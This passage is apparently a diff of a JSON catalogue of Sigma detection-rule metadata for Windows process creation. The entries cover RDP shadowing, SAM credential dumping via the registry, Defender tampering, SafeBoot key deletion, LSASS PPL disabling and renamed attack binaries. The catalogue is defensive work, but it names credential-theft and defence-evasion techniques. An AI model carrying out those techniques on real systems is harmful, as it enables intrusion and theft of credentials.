"uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "value": "MSTSC Shadowing", + "meta": { + "refs": [ + "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002" + ], + "creation_date": "2020/01/24", + "filename": "proc_creation_win_rdp_hijack_shadowing.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", + "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", + "value": "Suspicious Redirection to Local Admin Share", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/16", + "filename": "proc_creation_win_redirect_local_admin_share.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", + "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", + "value": "Cmd Stream Redirection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/02/04", + "filename": "proc_creation_win_redirect_to_stream.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "value": "RedMimicry Winnti Playbook Execute", + "meta": { + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" + ], + "creation_date": "2020/06/24", + "filename": "proc_creation_win_redmimicry_winnti_proc.yml", + "author": "Alexander Rausch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the export of a crital Registry key to a file.", + "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", + "value": "Exports Critical Registry Keys To a File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_regedit_export_critical_keys.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "high", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the export of the target Registry key to a file.", + "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "value": "Exports Registry Key To a File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_regedit_export_keys.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate export of keys" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "value": "Imports Registry Key From a File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_regedit_import_keys.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate import of keys", + "Evernote" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "value": "Imports Registry Key From an ADS", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_regedit_import_keys_ads.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", + "value": "Modifies the Registry From a File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_regini.yml", + "author": "Eli Salem, Sander Wiebing, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate modification of keys" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "value": "Modifies the Registry From a ADS", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_regini_ads.yml", + "author": "Eli Salem, Sander Wiebing, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", + "value": "Reg Add RUN Key", + "meta": { + "refs": [ + "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", + "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2021/06/28", + "filename": "proc_creation_win_reg_add_run_key.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "value": "Add SafeBoot Keys Via Reg Utility", + "meta": { + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/09/02", + "filename": "proc_creation_win_reg_add_safeboot.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.", + "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", + "value": "Registry Defender Exclusions", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_reg_defender_exclusion.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects reg command lines that disable certain important features of Microsoft Defender", + "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", + "value": "Registry Defender Tampering", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/03/22", + "filename": "proc_creation_win_reg_defender_tampering.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rare legitimate use by administrators to test software (should always be investigated)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "value": "Delete SafeBoot Keys Via Reg Utility", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/08", + "filename": "proc_creation_win_reg_delete_safeboot.yml", + "author": "Nasreddine Bencherchali, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "value": "Delete Services Via Reg Utility", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_reg_delete_services.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", + "value": "Registry Dump of SAM Creds and Secrets", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2022/01/05", + "filename": "proc_creation_win_reg_dump_sam.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys", + "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", + "value": "Enabling RDP Service via Reg.exe", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" + ], + "creation_date": "2022/02/12", + "filename": "proc_creation_win_reg_enable_rdp.yml", + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility", + "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", + "value": "Imports Registry Key From a File Using Reg.exe", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate import of keys" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects reg command lines that disables PPL on the LSA process", + "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "value": "Registry Disabling LSASS PPL", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.010" + ], + "creation_date": "2022/03/22", + "filename": "proc_creation_win_reg_lsass_ppl.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "value": "Service ImagePath Change with Reg.exe", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ], + "creation_date": "2021/12/30", + "filename": "proc_creation_win_reg_service_imagepath_change.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "value": "Potential Remote Desktop Tunneling", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_remote_desktop_tunneling.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", + "value": "Remote File Download via Desktopimgdownldr Utility", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "value": "Remote PowerShell Session Host Process (WinRM)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" + ], + "creation_date": "2019/09/12", + "filename": "proc_creation_win_remote_powershell_session_process.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "medium", + "falsepositive": [ + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", + "value": "Discovery of a System Time", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_remote_time_discovery.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate use of the system utilities to discover system time for legitimate reason" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", + "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", + "value": "Remove Windows Defender Definition Files", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/07", + "filename": "proc_creation_win_remove_windows_defender_definition_files.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "value": "Renamed Binary", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2019/06/15", + "filename": "proc_creation_win_renamed_binary.yml", + "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)", + "level": "medium", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "value": "Highly Relevant Renamed Binary", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2019/06/15", + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", + "author": "Matthew Green - @mgreen27, Florian Roth", + "level": "high", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "value": "Process Creation with Renamed BrowserCore.exe", + "meta": { + "refs": [ + "https://twitter.com/mariuszbit/status/1531631015139102720", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" + ], + "tags": [ + "attack.t1528", + "attack.t1036.003" + ], + "creation_date": "2022/06/02", + "filename": "proc_creation_win_renamed_browsercore.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field", + "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", + "value": "Renamed FTP.EXE Binary Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_renamed_ftp.yml", + "author": "Victor Sergeev, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects renamed jusched.exe used by cobalt group", + "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "value": "Renamed jusched.exe", + "meta": { + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2019/06/04", + "filename": "proc_creation_win_renamed_jusched.yml", + "author": "Markus Neis, Swisscom", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "value": "Rename Mavinject Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ], + "creation_date": "2022/12/05", + "filename": "proc_creation_win_renamed_mavinject.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "value": "Renamed MegaSync", + "meta": { + "refs": [ + "https://redcanary.com/blog/rclone-mega-extortion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/06/22", + "filename": "proc_creation_win_renamed_megasync.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "Software that illegaly integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process creation with a renamed Msdt.exe", + "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "value": "Renamed Msdt.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_win_renamed_msdt.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "uuid": "0afbd410-de03-4078-8491-f132303cb67d", + "value": "Execution of Renamed NetSupport RAT", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/19", + "filename": "proc_creation_win_renamed_netsupport_rat.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of renamed paexec via imphash and executable product string", + "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", + "value": "Execution of Renamed PaExec", + "meta": { + "refs": [ + "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.g0046", + "car.2013-05-009", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2019/04/17", + "filename": "proc_creation_win_renamed_paexec.yml", + "author": "Jason Lynch", + "level": "medium", + "falsepositive": [ + "Unknown imphashes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execution of a renamed version of the Plink binary", + "uuid": 